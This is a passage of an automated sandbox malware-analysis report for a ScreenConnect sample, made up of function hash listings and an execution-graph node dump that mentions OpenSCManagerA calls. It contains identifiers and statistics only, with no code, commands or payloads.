                                                                                                                                                                                                                                                        • Opcode ID: e5998c549f0f19fac355c3358c83399b4293aee2216d39dcf4bb1a9ea8baccf6
                                                                                                                                                                                                                                                        • Instruction ID: 47770c1017ee6264381406325eaca505ee4e9255a48a6c872e112fb91d9c895c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5998c549f0f19fac355c3358c83399b4293aee2216d39dcf4bb1a9ea8baccf6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93F02B35A046414FCB13A77CE85055D3BE2DEC6640304C0AED4C6D7386DB6098079B81
                                                                                                                                                                                                                                                        Function 01071414 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: afdb1b97042d626c13f58ea943c8d00614b0061bd8ff94838bbf8ad0dc1e8f61
                                                                                                                                                                                                                                                        • Instruction ID: 814138b071bf209289da677f6131c6246e8b34056c1c5dcb03e482802526a894
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afdb1b97042d626c13f58ea943c8d00614b0061bd8ff94838bbf8ad0dc1e8f61
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5F0246310C3D18FD3239778A8613A97FE1DE9311038989CBD0C28B597D799B90BD362
                                                                                                                                                                                                                                                        Function 01075F68 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6e1ef0f8f09e4be23ad8f70b175788c003f097f64ece85f1b884399fef8a976e
                                                                                                                                                                                                                                                        • Instruction ID: 7cc772fcd348bf415ffd7dacce08961ccf272a8696f82f2cb7bda11636bfd4d9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e1ef0f8f09e4be23ad8f70b175788c003f097f64ece85f1b884399fef8a976e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33F02222F065815FCB01826C6C555E5BFEA8E4B16032DC5E2F4A9CB252FA16CC038381
                                                                                                                                                                                                                                                        Function 01071DA1 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17ffde8deec0c32cda9e2790e6062b049000f5de88be141a2bf2e2cafcafe274
                                                                                                                                                                                                                                                        • Instruction ID: dcd2ae4c7bfbd6bb9b53287afe82e32ed71e600f8aa6fc916bfde695ec5b27bc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17ffde8deec0c32cda9e2790e6062b049000f5de88be141a2bf2e2cafcafe274
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F0E5353061885FC3015778A8194AD3FE6DFC611131582AFE556D3BA1CE254C03D761
                                                                                                                                                                                                                                                        Function 01076EE8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 11a602ce65afd5b39ac42100596bea855b1f4fcb6b603ad1bba56e6ab8e177e2
                                                                                                                                                                                                                                                        • Instruction ID: 1ebe3faac70ea13350193247dfbb0e61cbf08d80c5538ed50708a1319eee4e30
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11a602ce65afd5b39ac42100596bea855b1f4fcb6b603ad1bba56e6ab8e177e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14F0E5327043585BD7145AAB7C4862A7FEAEBC9761B18417FE20AC3351DE299C0583A6
                                                                                                                                                                                                                                                        Function 010712B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5d61b8a9b7c437374d4c366c2837a000033a6bc4014ae4a6028a6a86f8257c25
                                                                                                                                                                                                                                                        • Instruction ID: c56d28f5317dc44d9c0dac68218bdcc36739bf494a41efe8504f4826e06b2f1f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d61b8a9b7c437374d4c366c2837a000033a6bc4014ae4a6028a6a86f8257c25
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89F06536B006069F8712AB6DE81495E77DADBC6A50344C42EE446C7385DF71EC03ABD5
                                                                                                                                                                                                                                                        Function 01076EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c9f9cc9e9c2fb24e82485ef2016e25ee6d5132270d751229432eb3874728f8ae
                                                                                                                                                                                                                                                        • Instruction ID: da9da1cbd2a9fe43a45b5edba5d37361ccac91cca6db4f744aeac81746e07f84
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9f9cc9e9c2fb24e82485ef2016e25ee6d5132270d751229432eb3874728f8ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CE086327003189797145AAF788852EBAEBFBCCB61754413EF60EC3350DE759C068395
                                                                                                                                                                                                                                                        Function 01071818 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f581084be56c21199217a0eb4ebd9998410098f123fdc85b1f18fe8d55e50076
                                                                                                                                                                                                                                                        • Instruction ID: 2375864ff2f780b03d4626966d9edf0197417458ad93773d274482ac22dd6ce7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f581084be56c21199217a0eb4ebd9998410098f123fdc85b1f18fe8d55e50076
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84E09B35909294CFC7425B74641D4687FF3FF4711130940EFD846972A2DB364812CF85
                                                                                                                                                                                                                                                        Function 01071DF9 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c00fbc98654977b62307a886af201a8160520da3dcce5e30bdfce9365f0c04f7
                                                                                                                                                                                                                                                        • Instruction ID: 9e4e3bf8fccd72f136c3057b16da490db73aa04b1cd5d011049ecbbed62746f2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00fbc98654977b62307a886af201a8160520da3dcce5e30bdfce9365f0c04f7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6E09A71905248DFCB00DBF0A9616A87BF5EF06200B10C1D9C949E7612EA365E02AB51
                                                                                                                                                                                                                                                        Function 01075F78 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9cc4de1aef7b40b2585268cc3ff94655411ee75e97fbe99cf4512ca8af9697b6
                                                                                                                                                                                                                                                        • Instruction ID: 8a99376119d7dfc9b9c969256c53b67202cb633d3f562f5d43f85fda386f38f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cc4de1aef7b40b2585268cc3ff94655411ee75e97fbe99cf4512ca8af9697b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DE08632F014515B8B50915D9C446D5B7C98B8926473DC5B1F968CB341FA21DC014385
                                                                                                                                                                                                                                                        Function 01071310 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5aae047dd2aab276dbc12a958fa317e2580c9dd6e5d3d0bd9c53021031bf83f
                                                                                                                                                                                                                                                        • Instruction ID: 18d08d44ecda04d9f358a243979db4bf2102bd9d443024d4359ef1173ada9af6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5aae047dd2aab276dbc12a958fa317e2580c9dd6e5d3d0bd9c53021031bf83f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E04FB1C051059FCF80DF7888661EEBFF0EB49114B1486EDC85DDB612F63256179B40
                                                                                                                                                                                                                                                        Function 010713D0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9f82d92cd9f8fa5ca5eedb10243bd7d7bcde009661404aa982a354faa70c3eaf
                                                                                                                                                                                                                                                        • Instruction ID: 2ff475fb13847ed91f180dddee3c84a4dd123cae5fd57b875666c6757d82bc98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f82d92cd9f8fa5ca5eedb10243bd7d7bcde009661404aa982a354faa70c3eaf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAE0922210D7D24FC322A738A4913E97FE1AE871147498A9AD0C24B54AC6956D4B83A2
                                                                                                                                                                                                                                                        Function 0107392C Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8fd498effdfe92560ec4e067e141d2e47780ea0572877e1f5de3c0a6b58f29c3
                                                                                                                                                                                                                                                        • Instruction ID: 5f0aae7be39f30987dcc0456a251d9e931116bdaf49846409d7d10c87b22dc9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fd498effdfe92560ec4e067e141d2e47780ea0572877e1f5de3c0a6b58f29c3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD01766A1E2D95FEB02127878A11FD7F64E98311570940E3D1D6CB063EA140A2B93AA
                                                                                                                                                                                                                                                        Function 01071DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6d5727b72550b6573403e061f1dbadbfcc63aa52f7676dd92568b35b247425c6
                                                                                                                                                                                                                                                        • Instruction ID: cd44db24a6c5b36911ac915e33c270e7b06af62b6b639d8d9c622f121a549485
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d5727b72550b6573403e061f1dbadbfcc63aa52f7676dd92568b35b247425c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FE086363121195B8204677DB80985E779BEBC96613108127F91AD33A0CE319C42D7D1
                                                                                                                                                                                                                                                        Function 01070838 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 777faa797cc779221e3362640cadd22527e5e787e622c350949d67be54b19b8a
                                                                                                                                                                                                                                                        • Instruction ID: 0e8b1dae0f22e36e41f31e2659f5e77b0f295ca4741b21834852e0cab7caacb3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 777faa797cc779221e3362640cadd22527e5e787e622c350949d67be54b19b8a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E0D871946149AFCF01DBB8D8496EC7FB1EF41204F0445EDC045D3212D9300A079B00
                                                                                                                                                                                                                                                        Function 01077FB8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d34ede7b096cc52efb20901bb7025d012e51b68b2b40836383c56a37baeb2079
                                                                                                                                                                                                                                                        • Instruction ID: bbb2a9eaa4fa52288134e2658c33c8d36154ca53a641042a10bc075f9963b841
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d34ede7b096cc52efb20901bb7025d012e51b68b2b40836383c56a37baeb2079
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E04F31449341DFC340DB34A9892957FF0DF09610F49889EE9C8C7211E634AD57DB42
                                                                                                                                                                                                                                                        Function 01078120 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ee68a6560bdd850238fabd9e78aef6d015e6510ed108bf2b3178b0c87a39224c
                                                                                                                                                                                                                                                        • Instruction ID: e27fc44a8df6fb96a6f89ee61b8088fa0974950b69af37b86a1f51986e22478d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee68a6560bdd850238fabd9e78aef6d015e6510ed108bf2b3178b0c87a39224c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09E04630419251CFC380EF38A989094BBF0EE09200B4588AED888C7611E638AA478B42
                                                                                                                                                                                                                                                        Function 01070848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9d177071eb7ec22472d68d889e66208a6ad6f78156d71b883cf8538739684105
                                                                                                                                                                                                                                                        • Instruction ID: fe31571d959b7c228b0a04b0b14c1535bf1772c4573d7d7565ac0a1c868c9f4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d177071eb7ec22472d68d889e66208a6ad6f78156d71b883cf8538739684105
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57D0127190120EEFCB00DFA4E90555D77B9EB45244B1045A9D409D3311DA311F06AB51
                                                                                                                                                                                                                                                        Function 01071E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7ee70a0010683f4b1ab12242536d44112ac32698fe88391240ee84c2b072dbe0
                                                                                                                                                                                                                                                        • Instruction ID: bdd486028e69a6204e6d6ed1abc5c8bb46816448999077200bc7c059089774af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ee70a0010683f4b1ab12242536d44112ac32698fe88391240ee84c2b072dbe0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08D017B1A0120DEFDB40EFA4EA11A5DB7B9EB49204B5081A9D909E3310EA31AF009B91

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10.2%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:311
                                                                                                                                                                                                                                                        Total number of Limit Nodes:34
                                                                                                                                                                                                                                                        execution_graph 40305 19136b0 40306 19136c6 40305->40306 40307 1913764 40306->40307 40311 191c6d0 40306->40311 40316 191c662 40306->40316 40308 1913739 40312 191c6d5 40311->40312 40313 191c746 40312->40313 40321 191cbb0 40312->40321 40325 191cbc0 40312->40325 40313->40308 40317 191c666 40316->40317 40318 191c696 40316->40318 40317->40318 40319 191cbb0 2 API calls 40317->40319 40320 191cbc0 2 API calls 40317->40320 40318->40308 40319->40318 40320->40318 40322 191cbc0 40321->40322 40323 191cc1e 40322->40323 40329 191d069 40322->40329 40323->40313 40327 191cbe6 40325->40327 40326 191cc1e 40326->40313 40327->40326 40328 191d069 2 API calls 40327->40328 40328->40326 40330 191d0a6 40329->40330 40334 191d7f8 40330->40334 40339 191d808 40330->40339 40331 191d2ce 40336 191d82c 40334->40336 40335 191d87b 40335->40331 40336->40335 40344 1916558 40336->40344 40358 1916568 40336->40358 40340 191d82c 40339->40340 40341 191d87b 40340->40341 40342 1916558 2 API calls 40340->40342 40343 1916568 2 API calls 40340->40343 40341->40331 40342->40341 40343->40341 40345 191659b 40344->40345 40347 191658b 40344->40347 40345->40347 40350 1916558 2 API calls 40345->40350 40354 1916568 2 API calls 40345->40354 40372 191d9a0 40345->40372 40377 191a7a8 40345->40377 40382 40d2ab0 40345->40382 40391 191d9b0 40345->40391 40396 191a7b8 40345->40396 40401 40d2aa2 40345->40401 40346 1916594 40346->40335 40347->40346 40356 40d2ab0 2 API calls 40347->40356 40357 40d2aa2 2 API calls 40347->40357 40350->40347 40354->40347 40356->40347 40357->40347 40359 191658b 40358->40359 40361 191659b 40358->40361 40360 1916594 40359->40360 40370 40d2ab0 2 API calls 40359->40370 40371 40d2aa2 2 API calls 40359->40371 40360->40335 40361->40359 40362 191d9b0 2 API calls 40361->40362 40363 191a7b8 2 API calls 40361->40363 40364 1916558 2 API calls 40361->40364 40365 40d2aa2 2 API calls 40361->40365 40366 191d9a0 2 API calls 40361->40366 40367 191a7a8 2 API calls 40361->40367 40368 1916568 2 API calls 40361->40368 40369 40d2ab0 2 API calls 40361->40369 40362->40359 40363->40359 40364->40359 40365->40359 40366->40359 40367->40359 40368->40359 40369->40359 40370->40359 40371->40359 40373 191d9d3 40372->40373 40374 191d9e3 40372->40374 40373->40347 40375 1916558 2 API calls 40374->40375 40376 1916568 2 API calls 40374->40376 40375->40373 40376->40373 40378 191a7e9 40377->40378 40379 191a7dd 40377->40379 40378->40379 40380 40d2ab0 2 API calls 40378->40380 40381 40d2aa2 2 API calls 40378->40381 40379->40347 40380->40379 40381->40379 40384 40d2ae4 40382->40384 40385 40d2ad4 40382->40385 40383 40d2add 40383->40347 40389 1916558 2 API calls 40384->40389 40390 1916568 2 API calls 40384->40390 40385->40383 40410 40d44f0 40385->40410 40414 40d4500 40385->40414 40418 40d456a 40385->40418 40389->40385 40390->40385 40392 191d9d3 40391->40392 40393 191d9e3 40391->40393 40392->40347 40394 1916558 2 API calls 40393->40394 40395 1916568 2 API calls 40393->40395 40394->40392 40395->40392 40397 191a7dd 40396->40397 40398 191a7e9 40396->40398 40397->40347 40398->40397 40399 40d2ab0 2 API calls 40398->40399 40400 40d2aa2 2 API calls 40398->40400 40399->40397 40400->40397 40403 40d2aad 40401->40403 40402 40d2add 40402->40347 40404 40d2ad4 40403->40404 40405 1916558 2 API calls 40403->40405 40406 1916568 2 API calls 40403->40406 40404->40402 40407 40d456a 2 API calls 40404->40407 40408 40d44f0 2 API calls 40404->40408 40409 40d4500 2 API calls 40404->40409 40405->40404 40406->40404 40407->40402 40408->40402 40409->40402 40411 40d4530 40410->40411 40412 40d454b 40411->40412 40423 191e2a2 40411->40423 40412->40383 40415 40d4530 40414->40415 40416 40d454b 40415->40416 40417 191e2a2 2 API calls 40415->40417 40416->40383 40417->40416 40419 40d4538 40418->40419 40421 40d4592 40418->40421 40420 40d454b 40419->40420 40422 191e2a2 2 API calls 40419->40422 40420->40383 40421->40383 40422->40420 40424 191e2b5 40423->40424 40425 191e2d2 40424->40425 40428 40d4610 40424->40428 40433 40d4660 40424->40433 40425->40412 40429 40d463f 40428->40429 40430 40d46fb 40429->40430 40438 40d4958 40429->40438 40443 40d4798 40429->40443 40430->40425 40435 40d466a 40433->40435 40434 40d46fb 40434->40425 40435->40434 40436 40d4798 2 API calls 40435->40436 40437 40d4958 2 API calls 40435->40437 40436->40434 40437->40434 40440 40d496a 40438->40440 40439 40d49dd 40439->40430 40440->40439 40441 40d4f8b OpenSCManagerA OpenSCManagerA 40440->40441 40442 40d4fc0 OpenSCManagerA OpenSCManagerA 40440->40442 40441->40439 40442->40439 40445 40d47c8 40443->40445 40444 40d47f5 40444->40430 40445->40444 40446 40d4f8b OpenSCManagerA OpenSCManagerA 40445->40446 40447 40d4fc0 OpenSCManagerA OpenSCManagerA 40445->40447 40446->40444 40447->40444 40128 5721f30 40132 5721fa8 40128->40132 40136 5721f99 40128->40136 40129 5721f53 40134 5721fb9 40132->40134 40133 5721fef 40133->40129 40134->40133 40140 40d5021 40134->40140 40138 5721fb9 40136->40138 40137 5721fef 40137->40129 40138->40137 40139 40d5021 2 API calls 40138->40139 40139->40137 40143 40d5050 40140->40143 40146 5721308 40140->40146 40153 57213b8 40140->40153 40161 5721318 40140->40161 40168 57213c8 40140->40168 40143->40133 40147 5721322 40146->40147 40148 5721324 40146->40148 40147->40143 40171 5723bd1 40148->40171 40176 5723c08 40148->40176 40180 5723c18 40148->40180 40149 572132a 40149->40143 40154 57213c7 40153->40154 40156 5721353 40153->40156 40158 57213e9 40154->40158 40188 57214f0 40154->40188 40155 5721355 40155->40143 40156->40155 40159 40d5021 2 API calls 40156->40159 40157 57213af 40157->40143 40158->40158 40159->40157 40162 5721322 40161->40162 40163 5721324 40161->40163 40162->40143 40165 5723bd1 2 API calls 40163->40165 40166 5723c18 2 API calls 40163->40166 40167 5723c08 2 API calls 40163->40167 40164 572132a 40164->40143 40165->40164 40166->40164 40167->40164 40170 57214f0 2 API calls 40168->40170 40169 57213e9 40169->40169 40170->40169 40172 5723bda 40171->40172 40175 5723c20 40171->40175 40172->40149 40184 57212c0 40175->40184 40177 5723c18 40176->40177 40178 57212c0 2 API calls 40177->40178 40179 5723c2e 40178->40179 40179->40149 40183 5723c27 40180->40183 40181 57212c0 2 API 